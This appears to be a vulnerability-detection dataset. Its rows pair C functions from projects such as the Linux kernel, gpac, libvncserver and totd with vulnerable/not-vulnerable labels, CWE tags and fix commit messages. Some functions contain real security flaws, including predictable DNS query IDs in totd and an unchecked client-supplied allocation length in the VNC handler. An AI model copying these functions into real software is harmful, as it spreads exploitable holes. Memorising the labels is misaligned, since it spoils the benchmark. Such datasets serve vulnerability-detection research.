func
stringlengths 0
484k
| target
int64 0
1
| cwe
listlengths 0
4
| project
stringclasses 799
values | commit_id
stringlengths 40
40
| hash
float64 1,215,700,430,453,689,100,000,000B
340,281,914,521,452,260,000,000,000,000B
| size
int64 1
24k
| message
stringlengths 0
13.3k
|
---|---|---|---|---|---|---|---|
static __init int vmx_disabled_by_bios(void)
{
return !boot_cpu_has(X86_FEATURE_MSR_IA32_FEAT_CTL) ||
!boot_cpu_has(X86_FEATURE_VMX);
}
| 0 |
[
"CWE-787"
] |
linux
|
04c4f2ee3f68c9a4bf1653d15f1a9a435ae33f7a
| 80,413,216,101,823,000,000,000,000,000,000,000,000 | 5 |
KVM: VMX: Don't use vcpu->run->internal.ndata as an array index
__vmx_handle_exit() uses vcpu->run->internal.ndata as an index for
an array access. Since vcpu->run is (can be) mapped to a user address
space with a writer permission, the 'ndata' could be updated by the
user process at anytime (the user process can set it to outside the
bounds of the array).
So, it is not safe that __vmx_handle_exit() uses the 'ndata' that way.
Fixes: 1aa561b1a4c0 ("kvm: x86: Add "last CPU" to some KVM_EXIT information")
Signed-off-by: Reiji Watanabe <[email protected]>
Reviewed-by: Jim Mattson <[email protected]>
Message-Id: <[email protected]>
Cc: [email protected]
Signed-off-by: Paolo Bonzini <[email protected]>
|
ext4_ext_search_left(struct inode *inode, struct ext4_ext_path *path,
ext4_lblk_t *logical, ext4_fsblk_t *phys)
{
struct ext4_extent_idx *ix;
struct ext4_extent *ex;
int depth, ee_len;
BUG_ON(path == NULL);
depth = path->p_depth;
*phys = 0;
if (depth == 0 && path->p_ext == NULL)
return 0;
/* usually extent in the path covers blocks smaller
* then *logical, but it can be that extent is the
* first one in the file */
ex = path[depth].p_ext;
ee_len = ext4_ext_get_actual_len(ex);
if (*logical < le32_to_cpu(ex->ee_block)) {
BUG_ON(EXT_FIRST_EXTENT(path[depth].p_hdr) != ex);
while (--depth >= 0) {
ix = path[depth].p_idx;
BUG_ON(ix != EXT_FIRST_INDEX(path[depth].p_hdr));
}
return 0;
}
BUG_ON(*logical < (le32_to_cpu(ex->ee_block) + ee_len));
*logical = le32_to_cpu(ex->ee_block) + ee_len - 1;
*phys = ext_pblock(ex) + ee_len - 1;
return 0;
}
| 0 |
[
"CWE-703"
] |
linux
|
744692dc059845b2a3022119871846e74d4f6e11
| 116,605,259,511,672,840,000,000,000,000,000,000,000 | 35 |
ext4: use ext4_get_block_write in buffer write
Allocate uninitialized extent before ext4 buffer write and
convert the extent to initialized after io completes.
The purpose is to make sure an extent can only be marked
initialized after it has been written with new data so
we can safely drop the i_mutex lock in ext4 DIO read without
exposing stale data. This helps to improve multi-thread DIO
read performance on high-speed disks.
Skip the nobh and data=journal mount cases to make things simple for now.
Signed-off-by: Jiaying Zhang <[email protected]>
Signed-off-by: "Theodore Ts'o" <[email protected]>
|
TEST(UriSuite, TestUriUserInfoHostPort23Bug3510198RelatedOne) {
// Empty user info
UriParserStateA stateA;
UriUriA uriA;
stateA.uri = &uriA;
int res;
// 0 4 0 3 01 0 4 01
res = uriParseUriA(&stateA, "http" "://" "@" "host" "/");
ASSERT_TRUE(URI_SUCCESS == res);
ASSERT_TRUE(uriA.userInfo.afterLast != NULL);
ASSERT_TRUE(uriA.userInfo.first != NULL);
ASSERT_TRUE(uriA.userInfo.afterLast - uriA.userInfo.first == 0);
ASSERT_TRUE(!memcmp(uriA.hostText.first, "host", 4 * sizeof(char)));
ASSERT_TRUE(uriA.hostText.afterLast - uriA.hostText.first == 4);
ASSERT_TRUE(uriA.portText.first == NULL);
ASSERT_TRUE(uriA.portText.afterLast == NULL);
uriFreeUriMembersA(&uriA);
}
| 0 |
[
"CWE-125"
] |
uriparser
|
cef25028de5ff872c2e1f0a6c562eb3ea9ecbce4
| 245,829,355,703,906,000,000,000,000,000,000,000,000 | 19 |
Fix uriParse*Ex* out-of-bounds read
|
static void stub_timer(unsigned long data)
{
WARN_ON(1);
}
| 0 |
[
"CWE-200"
] |
tip
|
dfb4357da6ddbdf57d583ba64361c9d792b0e0b1
| 187,583,036,716,534,130,000,000,000,000,000,000,000 | 4 |
time: Remove CONFIG_TIMER_STATS
Currently CONFIG_TIMER_STATS exposes process information across namespaces:
kernel/time/timer_list.c print_timer():
SEQ_printf(m, ", %s/%d", tmp, timer->start_pid);
/proc/timer_list:
#11: <0000000000000000>, hrtimer_wakeup, S:01, do_nanosleep, cron/2570
Given that the tracer can give the same information, this patch entirely
removes CONFIG_TIMER_STATS.
Suggested-by: Thomas Gleixner <[email protected]>
Signed-off-by: Kees Cook <[email protected]>
Acked-by: John Stultz <[email protected]>
Cc: Nicolas Pitre <[email protected]>
Cc: [email protected]
Cc: Lai Jiangshan <[email protected]>
Cc: Shuah Khan <[email protected]>
Cc: Xing Gao <[email protected]>
Cc: Jonathan Corbet <[email protected]>
Cc: Jessica Frazelle <[email protected]>
Cc: [email protected]
Cc: Nicolas Iooss <[email protected]>
Cc: "Paul E. McKenney" <[email protected]>
Cc: Petr Mladek <[email protected]>
Cc: Richard Cochran <[email protected]>
Cc: Tejun Heo <[email protected]>
Cc: Michal Marek <[email protected]>
Cc: Josh Poimboeuf <[email protected]>
Cc: Dmitry Vyukov <[email protected]>
Cc: Oleg Nesterov <[email protected]>
Cc: "Eric W. Biederman" <[email protected]>
Cc: Olof Johansson <[email protected]>
Cc: Andrew Morton <[email protected]>
Cc: [email protected]
Cc: Arjan van de Ven <[email protected]>
Link: http://lkml.kernel.org/r/20170208192659.GA32582@beast
Signed-off-by: Thomas Gleixner <[email protected]>
|
u32 gf_isom_get_sync_point_count(GF_ISOFile *the_file, u32 trackNumber)
{
GF_TrackBox *trak;
trak = gf_isom_get_track_from_file(the_file, trackNumber);
if (!trak) return 0;
if (trak->Media->information->sampleTable->SyncSample) {
return trak->Media->information->sampleTable->SyncSample->nb_entries;
}
return 0;
}
| 0 |
[
"CWE-476"
] |
gpac
|
ebfa346eff05049718f7b80041093b4c5581c24e
| 545,234,232,922,466,700,000,000,000,000,000,000 | 10 |
fixed #1706
|
static int do_loopback(struct path *path, const char *old_name,
int recurse)
{
LIST_HEAD(umount_list);
struct path old_path;
struct mount *mnt = NULL, *old;
int err;
if (!old_name || !*old_name)
return -EINVAL;
err = kern_path(old_name, LOOKUP_FOLLOW|LOOKUP_AUTOMOUNT, &old_path);
if (err)
return err;
err = -EINVAL;
if (mnt_ns_loop(&old_path))
goto out;
err = lock_mount(path);
if (err)
goto out;
old = real_mount(old_path.mnt);
err = -EINVAL;
if (IS_MNT_UNBINDABLE(old))
goto out2;
if (!check_mnt(real_mount(path->mnt)) || !check_mnt(old))
goto out2;
if (recurse)
mnt = copy_tree(old, old_path.dentry, 0);
else
mnt = clone_mnt(old, old_path.dentry, 0);
if (IS_ERR(mnt)) {
err = PTR_ERR(mnt);
goto out;
}
err = graft_tree(mnt, path);
if (err) {
br_write_lock(&vfsmount_lock);
umount_tree(mnt, 0, &umount_list);
br_write_unlock(&vfsmount_lock);
}
out2:
unlock_mount(path);
release_mounts(&umount_list);
out:
path_put(&old_path);
return err;
}
| 0 |
[
"CWE-284",
"CWE-264"
] |
linux
|
3151527ee007b73a0ebd296010f1c0454a919c7d
| 199,408,790,077,146,800,000,000,000,000,000,000,000 | 53 |
userns: Don't allow creation if the user is chrooted
Guarantee that the policy of which files may be access that is
established by setting the root directory will not be violated
by user namespaces by verifying that the root directory points
to the root of the mount namespace at the time of user namespace
creation.
Changing the root is a privileged operation, and as a matter of policy
it serves to limit unprivileged processes to files below the current
root directory.
For reasons of simplicity and comprehensibility the privilege to
change the root directory is gated solely on the CAP_SYS_CHROOT
capability in the user namespace. Therefore when creating a user
namespace we must ensure that the policy of which files may be access
can not be violated by changing the root directory.
Anyone who runs a processes in a chroot and would like to use user
namespace can setup the same view of filesystems with a mount
namespace instead. With this result that this is not a practical
limitation for using user namespaces.
Cc: [email protected]
Acked-by: Serge Hallyn <[email protected]>
Reported-by: Andy Lutomirski <[email protected]>
Signed-off-by: "Eric W. Biederman" <[email protected]>
|
static int selinux_socket_listen(struct socket *sock, int backlog)
{
return sock_has_perm(sock->sk, SOCKET__LISTEN);
}
| 0 |
[
"CWE-349"
] |
linux
|
fb73974172ffaaf57a7c42f35424d9aece1a5af6
| 7,134,701,723,547,158,000,000,000,000,000,000,000 | 4 |
selinux: properly handle multiple messages in selinux_netlink_send()
Fix the SELinux netlink_send hook to properly handle multiple netlink
messages in a single sk_buff; each message is parsed and subject to
SELinux access control. Prior to this patch, SELinux only inspected
the first message in the sk_buff.
Cc: [email protected]
Reported-by: Dmitry Vyukov <[email protected]>
Reviewed-by: Stephen Smalley <[email protected]>
Signed-off-by: Paul Moore <[email protected]>
|
GF_Box *npck_box_new()
{
ISOM_DECL_BOX_ALLOC(GF_NPCKBox, GF_ISOM_BOX_TYPE_NPCK);
return (GF_Box *)tmp;
}
| 0 |
[
"CWE-787"
] |
gpac
|
388ecce75d05e11fc8496aa4857b91245007d26e
| 28,377,885,427,206,597,000,000,000,000,000,000,000 | 5 |
fixed #1587
|
int mesg_make_query (u_char *qname, uint16_t qtype, uint16_t qclass,
uint32_t id, int rd, u_char *buf, int buflen) {
char *fn = "mesg_make_query()";
u_char *ucp;
int i, written_len;
Mesg_Hdr *hdr;
if (T.debug > 4)
syslog (LOG_DEBUG, "%s: (qtype: %s, id: %d): start", fn,
string_rtype (qtype), id);
hdr = (Mesg_Hdr *) buf;
/* write header */
hdr->id = id;
hdr->opcode = OP_QUERY;
hdr->rcode = RC_OK;
hdr->rd = rd;
hdr->qr = hdr->aa = hdr->tc = hdr->ra = hdr->zero = 0;
hdr->qdcnt = ntohs (1);
hdr->ancnt = hdr->nscnt = hdr->arcnt = ntohs (0);
written_len = sizeof (Mesg_Hdr);
ucp = (u_char *) (hdr + 1);
/* write qname */
if (T.debug > 4)
syslog (LOG_DEBUG, "%s: qname offset = %zd", fn, ucp - buf);
i = dname_copy (qname, ucp, buflen - written_len);
if (i < 0)
return -1;
written_len += i;
ucp += i;
/* write qtype / qclass */
if (T.debug > 4)
syslog (LOG_DEBUG, "%s: qtype/qclass offset = %zd",
fn, ucp - buf);
written_len += sizeof (uint16_t) * 2;
if (written_len > buflen)
return -1;
PUTSHORT (qtype, ucp);
PUTSHORT (qclass, ucp);
return written_len;
}
| 1 |
[
"CWE-330"
] |
totd
|
afd8a10a6a21f82a70940d1b43cff48143250399
| 188,979,587,925,268,400,000,000,000,000,000,000,000 | 50 |
Patch provided by Gabor Lencse for generating better randomized mesg IDs.
|
rfbProcessClientNormalMessage(rfbClientPtr cl)
{
int n=0;
rfbClientToServerMsg msg;
char *str;
int i;
uint32_t enc=0;
uint32_t lastPreferredEncoding = -1;
char encBuf[64];
char encBuf2[64];
if ((n = rfbReadExact(cl, (char *)&msg, 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
switch (msg.type) {
case rfbSetPixelFormat:
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbSetPixelFormatMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
cl->format.bitsPerPixel = msg.spf.format.bitsPerPixel;
cl->format.depth = msg.spf.format.depth;
cl->format.bigEndian = (msg.spf.format.bigEndian ? TRUE : FALSE);
cl->format.trueColour = (msg.spf.format.trueColour ? TRUE : FALSE);
cl->format.redMax = Swap16IfLE(msg.spf.format.redMax);
cl->format.greenMax = Swap16IfLE(msg.spf.format.greenMax);
cl->format.blueMax = Swap16IfLE(msg.spf.format.blueMax);
cl->format.redShift = msg.spf.format.redShift;
cl->format.greenShift = msg.spf.format.greenShift;
cl->format.blueShift = msg.spf.format.blueShift;
cl->readyForSetColourMapEntries = TRUE;
cl->screen->setTranslateFunction(cl);
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetPixelFormatMsg, sz_rfbSetPixelFormatMsg);
return;
case rfbFixColourMapEntries:
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbFixColourMapEntriesMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetPixelFormatMsg, sz_rfbSetPixelFormatMsg);
rfbLog("rfbProcessClientNormalMessage: %s",
"FixColourMapEntries unsupported\n");
rfbCloseClient(cl);
return;
/* NOTE: Some clients send us a set of encodings (ie: PointerPos) designed to enable/disable features...
* We may want to look into this...
* Example:
* case rfbEncodingXCursor:
* cl->enableCursorShapeUpdates = TRUE;
*
* Currently: cl->enableCursorShapeUpdates can *never* be turned off...
*/
case rfbSetEncodings:
{
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbSetEncodingsMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
msg.se.nEncodings = Swap16IfLE(msg.se.nEncodings);
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetEncodingsMsg+(msg.se.nEncodings*4),sz_rfbSetEncodingsMsg+(msg.se.nEncodings*4));
/*
* UltraVNC Client has the ability to adapt to changing network environments
* So, let's give it a change to tell us what it wants now!
*/
if (cl->preferredEncoding!=-1)
lastPreferredEncoding = cl->preferredEncoding;
/* Reset all flags to defaults (allows us to switch between PointerPos and Server Drawn Cursors) */
cl->preferredEncoding=-1;
cl->useCopyRect = FALSE;
cl->useNewFBSize = FALSE;
cl->cursorWasChanged = FALSE;
cl->useRichCursorEncoding = FALSE;
cl->enableCursorPosUpdates = FALSE;
cl->enableCursorShapeUpdates = FALSE;
cl->enableCursorShapeUpdates = FALSE;
cl->enableLastRectEncoding = FALSE;
cl->enableKeyboardLedState = FALSE;
cl->enableSupportedMessages = FALSE;
cl->enableSupportedEncodings = FALSE;
cl->enableServerIdentity = FALSE;
for (i = 0; i < msg.se.nEncodings; i++) {
if ((n = rfbReadExact(cl, (char *)&enc, 4)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
enc = Swap32IfLE(enc);
switch (enc) {
case rfbEncodingCopyRect:
cl->useCopyRect = TRUE;
break;
case rfbEncodingRaw:
case rfbEncodingRRE:
case rfbEncodingCoRRE:
case rfbEncodingHextile:
case rfbEncodingUltra:
#ifdef LIBVNCSERVER_HAVE_LIBZ
case rfbEncodingZlib:
case rfbEncodingZRLE:
case rfbEncodingZYWRLE:
#ifdef LIBVNCSERVER_HAVE_LIBJPEG
case rfbEncodingTight:
#endif
#endif
/* The first supported encoding is the 'preferred' encoding */
if (cl->preferredEncoding == -1)
cl->preferredEncoding = enc;
break;
case rfbEncodingXCursor:
if(!cl->screen->dontConvertRichCursorToXCursor) {
rfbLog("Enabling X-style cursor updates for client %s\n",
cl->host);
/* if cursor was drawn, hide the cursor */
if(!cl->enableCursorShapeUpdates)
rfbRedrawAfterHideCursor(cl,NULL);
cl->enableCursorShapeUpdates = TRUE;
cl->cursorWasChanged = TRUE;
}
break;
case rfbEncodingRichCursor:
rfbLog("Enabling full-color cursor updates for client %s\n",
cl->host);
/* if cursor was drawn, hide the cursor */
if(!cl->enableCursorShapeUpdates)
rfbRedrawAfterHideCursor(cl,NULL);
cl->enableCursorShapeUpdates = TRUE;
cl->useRichCursorEncoding = TRUE;
cl->cursorWasChanged = TRUE;
break;
case rfbEncodingPointerPos:
if (!cl->enableCursorPosUpdates) {
rfbLog("Enabling cursor position updates for client %s\n",
cl->host);
cl->enableCursorPosUpdates = TRUE;
cl->cursorWasMoved = TRUE;
}
break;
case rfbEncodingLastRect:
if (!cl->enableLastRectEncoding) {
rfbLog("Enabling LastRect protocol extension for client "
"%s\n", cl->host);
cl->enableLastRectEncoding = TRUE;
}
break;
case rfbEncodingNewFBSize:
if (!cl->useNewFBSize) {
rfbLog("Enabling NewFBSize protocol extension for client "
"%s\n", cl->host);
cl->useNewFBSize = TRUE;
}
break;
case rfbEncodingKeyboardLedState:
if (!cl->enableKeyboardLedState) {
rfbLog("Enabling KeyboardLedState protocol extension for client "
"%s\n", cl->host);
cl->enableKeyboardLedState = TRUE;
}
break;
case rfbEncodingSupportedMessages:
if (!cl->enableSupportedMessages) {
rfbLog("Enabling SupportedMessages protocol extension for client "
"%s\n", cl->host);
cl->enableSupportedMessages = TRUE;
}
break;
case rfbEncodingSupportedEncodings:
if (!cl->enableSupportedEncodings) {
rfbLog("Enabling SupportedEncodings protocol extension for client "
"%s\n", cl->host);
cl->enableSupportedEncodings = TRUE;
}
break;
case rfbEncodingServerIdentity:
if (!cl->enableServerIdentity) {
rfbLog("Enabling ServerIdentity protocol extension for client "
"%s\n", cl->host);
cl->enableServerIdentity = TRUE;
}
break;
default:
#ifdef LIBVNCSERVER_HAVE_LIBZ
if ( enc >= (uint32_t)rfbEncodingCompressLevel0 &&
enc <= (uint32_t)rfbEncodingCompressLevel9 ) {
cl->zlibCompressLevel = enc & 0x0F;
#ifdef LIBVNCSERVER_HAVE_LIBJPEG
cl->tightCompressLevel = enc & 0x0F;
rfbLog("Using compression level %d for client %s\n",
cl->tightCompressLevel, cl->host);
#endif
} else if ( enc >= (uint32_t)rfbEncodingQualityLevel0 &&
enc <= (uint32_t)rfbEncodingQualityLevel9 ) {
cl->tightQualityLevel = enc & 0x0F;
rfbLog("Using image quality level %d for client %s\n",
cl->tightQualityLevel, cl->host);
} else
#endif
{
rfbExtensionData* e;
for(e = cl->extensions; e;) {
rfbExtensionData* next = e->next;
if(e->extension->enablePseudoEncoding &&
e->extension->enablePseudoEncoding(cl,
&e->data, (int)enc))
/* ext handles this encoding */
break;
e = next;
}
if(e == NULL) {
rfbBool handled = FALSE;
/* if the pseudo encoding is not handled by the
enabled extensions, search through all
extensions. */
rfbProtocolExtension* e;
for(e = rfbGetExtensionIterator(); e;) {
int* encs = e->pseudoEncodings;
while(encs && *encs!=0) {
if(*encs==(int)enc) {
void* data = NULL;
if(!e->enablePseudoEncoding(cl, &data, (int)enc)) {
rfbLog("Installed extension pretends to handle pseudo encoding 0x%x, but does not!\n",(int)enc);
} else {
rfbEnableExtension(cl, e, data);
handled = TRUE;
e = NULL;
break;
}
}
encs++;
}
if(e)
e = e->next;
}
rfbReleaseExtensionIterator();
if(!handled)
rfbLog("rfbProcessClientNormalMessage: "
"ignoring unsupported encoding type %s\n",
encodingName(enc,encBuf,sizeof(encBuf)));
}
}
}
}
if (cl->preferredEncoding == -1) {
if (lastPreferredEncoding==-1) {
cl->preferredEncoding = rfbEncodingRaw;
rfbLog("Defaulting to %s encoding for client %s\n", encodingName(cl->preferredEncoding,encBuf,sizeof(encBuf)),cl->host);
}
else {
cl->preferredEncoding = lastPreferredEncoding;
rfbLog("Sticking with %s encoding for client %s\n", encodingName(cl->preferredEncoding,encBuf,sizeof(encBuf)),cl->host);
}
}
else
{
if (lastPreferredEncoding==-1) {
rfbLog("Using %s encoding for client %s\n", encodingName(cl->preferredEncoding,encBuf,sizeof(encBuf)),cl->host);
} else {
rfbLog("Switching from %s to %s Encoding for client %s\n",
encodingName(lastPreferredEncoding,encBuf2,sizeof(encBuf2)),
encodingName(cl->preferredEncoding,encBuf,sizeof(encBuf)), cl->host);
}
}
if (cl->enableCursorPosUpdates && !cl->enableCursorShapeUpdates) {
rfbLog("Disabling cursor position updates for client %s\n",
cl->host);
cl->enableCursorPosUpdates = FALSE;
}
return;
}
case rfbFramebufferUpdateRequest:
{
sraRegionPtr tmpRegion;
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbFramebufferUpdateRequestMsg-1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbFramebufferUpdateRequestMsg,sz_rfbFramebufferUpdateRequestMsg);
/* The values come in based on the scaled screen, we need to convert them to
* values based on the main screen's coordinate system
*/
if(!rectSwapIfLEAndClip(&msg.fur.x,&msg.fur.y,&msg.fur.w,&msg.fur.h,cl))
{
rfbLog("Warning, ignoring rfbFramebufferUpdateRequest: %dXx%dY-%dWx%dH\n",msg.fur.x, msg.fur.y, msg.fur.w, msg.fur.h);
return;
}
tmpRegion =
sraRgnCreateRect(msg.fur.x,
msg.fur.y,
msg.fur.x+msg.fur.w,
msg.fur.y+msg.fur.h);
LOCK(cl->updateMutex);
sraRgnOr(cl->requestedRegion,tmpRegion);
if (!cl->readyForSetColourMapEntries) {
/* client hasn't sent a SetPixelFormat so is using server's */
cl->readyForSetColourMapEntries = TRUE;
if (!cl->format.trueColour) {
if (!rfbSetClientColourMap(cl, 0, 0)) {
sraRgnDestroy(tmpRegion);
TSIGNAL(cl->updateCond);
UNLOCK(cl->updateMutex);
return;
}
}
}
if (!msg.fur.incremental) {
sraRgnOr(cl->modifiedRegion,tmpRegion);
sraRgnSubtract(cl->copyRegion,tmpRegion);
}
TSIGNAL(cl->updateCond);
UNLOCK(cl->updateMutex);
sraRgnDestroy(tmpRegion);
return;
}
case rfbKeyEvent:
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbKeyEventMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbKeyEventMsg, sz_rfbKeyEventMsg);
if(!cl->viewOnly) {
cl->screen->kbdAddEvent(msg.ke.down, (rfbKeySym)Swap32IfLE(msg.ke.key), cl);
}
return;
case rfbPointerEvent:
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbPointerEventMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbPointerEventMsg, sz_rfbPointerEventMsg);
if (cl->screen->pointerClient && cl->screen->pointerClient != cl)
return;
if (msg.pe.buttonMask == 0)
cl->screen->pointerClient = NULL;
else
cl->screen->pointerClient = cl;
if(!cl->viewOnly) {
if (msg.pe.buttonMask != cl->lastPtrButtons ||
cl->screen->deferPtrUpdateTime == 0) {
cl->screen->ptrAddEvent(msg.pe.buttonMask,
ScaleX(cl->scaledScreen, cl->screen, Swap16IfLE(msg.pe.x)),
ScaleY(cl->scaledScreen, cl->screen, Swap16IfLE(msg.pe.y)),
cl);
cl->lastPtrButtons = msg.pe.buttonMask;
} else {
cl->lastPtrX = ScaleX(cl->scaledScreen, cl->screen, Swap16IfLE(msg.pe.x));
cl->lastPtrY = ScaleY(cl->scaledScreen, cl->screen, Swap16IfLE(msg.pe.y));
cl->lastPtrButtons = msg.pe.buttonMask;
}
}
return;
case rfbFileTransfer:
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbFileTransferMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
msg.ft.size = Swap32IfLE(msg.ft.size);
msg.ft.length = Swap32IfLE(msg.ft.length);
/* record statistics in rfbProcessFileTransfer as length is filled with garbage when it is not valid */
rfbProcessFileTransfer(cl, msg.ft.contentType, msg.ft.contentParam, msg.ft.size, msg.ft.length);
return;
case rfbSetSW:
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbSetSWMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
msg.sw.x = Swap16IfLE(msg.sw.x);
msg.sw.y = Swap16IfLE(msg.sw.y);
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetSWMsg, sz_rfbSetSWMsg);
/* msg.sw.status is not initialized in the ultraVNC viewer and contains random numbers (why???) */
rfbLog("Received a rfbSetSingleWindow(%d x, %d y)\n", msg.sw.x, msg.sw.y);
if (cl->screen->setSingleWindow!=NULL)
cl->screen->setSingleWindow(cl, msg.sw.x, msg.sw.y);
return;
case rfbSetServerInput:
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbSetServerInputMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetServerInputMsg, sz_rfbSetServerInputMsg);
/* msg.sim.pad is not initialized in the ultraVNC viewer and contains random numbers (why???) */
/* msg.sim.pad = Swap16IfLE(msg.sim.pad); */
rfbLog("Received a rfbSetServerInput(%d status)\n", msg.sim.status);
if (cl->screen->setServerInput!=NULL)
cl->screen->setServerInput(cl, msg.sim.status);
return;
case rfbTextChat:
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbTextChatMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
msg.tc.pad2 = Swap16IfLE(msg.tc.pad2);
msg.tc.length = Swap32IfLE(msg.tc.length);
switch (msg.tc.length) {
case rfbTextChatOpen:
case rfbTextChatClose:
case rfbTextChatFinished:
/* commands do not have text following */
/* Why couldn't they have used the pad byte??? */
str=NULL;
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbTextChatMsg, sz_rfbTextChatMsg);
break;
default:
if ((msg.tc.length>0) && (msg.tc.length<rfbTextMaxSize))
{
str = (char *)malloc(msg.tc.length);
if (str==NULL)
{
rfbLog("Unable to malloc %d bytes for a TextChat Message\n", msg.tc.length);
rfbCloseClient(cl);
return;
}
if ((n = rfbReadExact(cl, str, msg.tc.length)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
free(str);
rfbCloseClient(cl);
return;
}
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbTextChatMsg+msg.tc.length, sz_rfbTextChatMsg+msg.tc.length);
}
else
{
/* This should never happen */
rfbLog("client sent us a Text Message that is too big %d>%d\n", msg.tc.length, rfbTextMaxSize);
rfbCloseClient(cl);
return;
}
}
/* Note: length can be commands: rfbTextChatOpen, rfbTextChatClose, and rfbTextChatFinished
* at which point, the str is NULL (as it is not sent)
*/
if (cl->screen->setTextChat!=NULL)
cl->screen->setTextChat(cl, msg.tc.length, str);
free(str);
return;
case rfbClientCutText:
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbClientCutTextMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
msg.cct.length = Swap32IfLE(msg.cct.length);
str = (char *)malloc(msg.cct.length);
if ((n = rfbReadExact(cl, str, msg.cct.length)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
free(str);
rfbCloseClient(cl);
return;
}
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbClientCutTextMsg+msg.cct.length, sz_rfbClientCutTextMsg+msg.cct.length);
if(!cl->viewOnly) {
cl->screen->setXCutText(str, msg.cct.length, cl);
}
free(str);
return;
case rfbPalmVNCSetScaleFactor:
cl->PalmVNC = TRUE;
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbSetScaleMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetScaleMsg, sz_rfbSetScaleMsg);
rfbLog("rfbSetScale(%d)\n", msg.ssc.scale);
rfbScalingSetup(cl,cl->screen->width/msg.ssc.scale, cl->screen->height/msg.ssc.scale);
rfbSendNewScaleSize(cl);
return;
case rfbSetScale:
if ((n = rfbReadExact(cl, ((char *)&msg) + 1,
sz_rfbSetScaleMsg - 1)) <= 0) {
if (n != 0)
rfbLogPerror("rfbProcessClientNormalMessage: read");
rfbCloseClient(cl);
return;
}
rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetScaleMsg, sz_rfbSetScaleMsg);
rfbLog("rfbSetScale(%d)\n", msg.ssc.scale);
rfbScalingSetup(cl,cl->screen->width/msg.ssc.scale, cl->screen->height/msg.ssc.scale);
rfbSendNewScaleSize(cl);
return;
default:
{
rfbExtensionData *e,*next;
for(e=cl->extensions; e;) {
next = e->next;
if(e->extension->handleMessage &&
e->extension->handleMessage(cl, e->data, &msg))
{
rfbStatRecordMessageRcvd(cl, msg.type, 0, 0); /* Extension should handle this */
return;
}
e = next;
}
rfbLog("rfbProcessClientNormalMessage: unknown message type %d\n",
msg.type);
rfbLog(" ... closing connection\n");
rfbCloseClient(cl);
return;
}
}
}
| 0 |
[] |
libvncserver
|
804335f9d296440bb708ca844f5d89b58b50b0c6
| 300,301,677,235,870,000,000,000,000,000,000,000,000 | 622 |
Thread safety for zrle, zlib, tight.
Proposed tight security type fix for debian bug 517422.
|
R_API void r_bin_set_baddr(RBin *bin, ut64 baddr) {
RBinObject *o = r_bin_cur_object (bin);
binobj_set_baddr (o, baddr);
// XXX - update all the infos?
}
| 0 |
[
"CWE-125"
] |
radare2
|
d31c4d3cbdbe01ea3ded16a584de94149ecd31d9
| 285,977,869,512,834,530,000,000,000,000,000,000,000 | 5 |
Fix #8748 - Fix oobread on string search
|
GC_API void * GC_CALL GC_malloc_atomic_ignore_off_page(size_t lb)
{
return((void *)GC_generic_malloc_ignore_off_page(lb, PTRFREE));
}
| 0 |
[
"CWE-189"
] |
bdwgc
|
be9df82919960214ee4b9d3313523bff44fd99e1
| 267,344,377,676,232,000,000,000,000,000,000,000,000 | 4 |
Fix allocation size overflows due to rounding.
* malloc.c (GC_generic_malloc): Check if the allocation size is
rounded to a smaller value.
